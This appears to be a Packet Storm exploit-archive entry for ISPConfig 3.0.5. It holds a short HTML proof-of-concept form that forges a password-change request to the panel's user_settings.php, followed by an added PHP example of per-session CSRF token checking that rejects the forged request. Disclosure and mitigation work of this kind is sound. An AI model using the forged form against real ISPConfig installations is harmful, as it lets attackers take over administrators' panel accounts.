ISPConfig 3.0.5 Cross Site Request Forgery

2016-08-01T00:00:00
ID PACKETSTORM:138127
Type packetstorm
Reporter bl4ck_MohajeM
Modified 2016-08-01T00:00:00

Description

`<!--
# Exploit Title: ISPConfig 3.0.5 (Change Password) CSRF Exploit  
# Date: 11/07/2016  
# Exploit Author: bl4ck_mohajem  
# Vendor Homepage: http://www.ispconfig.org  
# Version: 3.0.5  
# Tested on: Ubuntu  
  
# Introduction:  
ISPConfig is an open source multilingual control panel which enables
you to manage multiple servers under one control panel.
  
#PoC :  
-->  
<form action="http://demo3.ispconfig.org/tools/user_settings.php" method="post">  
<input name="passwort" value="" type="password">  
<input name="repeat_password" value="" type="password">  
<input type="hidden" name="language" value="en">  
<input type="submit" value="Hack">  
</form>  
<!--

######################################################
#
#thanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky
############################################################
-->
`
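
The PoC form above submits only `passwort`, `repeat_password` and `language`, with no per-session token, so the server cannot tell it apart from the application's own settings form. A sketch of the server-side check that rejects such a request, as an added example and not ISPConfig's own code; the function names, the `csrf_token` field and the session key are assumptions:

```php
<?php
declare(strict_types=1);

// Added example, not ISPConfig's code. Function names, the 'csrf_token'
// field and the session key are assumptions made for illustration.

/** Create (once per session) the token to embed in the settings form. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only for a POST that carries this session's token. */
function csrf_request_is_valid(array $session, array $post, string $method): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false; // no token issued, or an array was sent as the field
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed demonstration: one session, two password-change requests.
$session = [];
$token = csrf_issue_token($session);

// What the cross-site form from the PoC sends: no token field at all.
$forged = ['passwort' => 'x', 'repeat_password' => 'x', 'language' => 'en'];
// What the application's own form sends once it embeds the token.
$genuine = $forged + ['csrf_token' => $token];

foreach (['forged' => $forged, 'genuine' => $genuine] as $label => $post) {
    $ok = csrf_request_is_valid($session, $post, 'POST');
    echo $label, ': ', $ok ? 'accepted' : 'rejected (HTTP 403)', PHP_EOL;
}
```

In a real handler the arguments would be `$_SESSION`, `$_POST` and `$_SERVER['REQUEST_METHOD']`, and the check would run before any password update is applied.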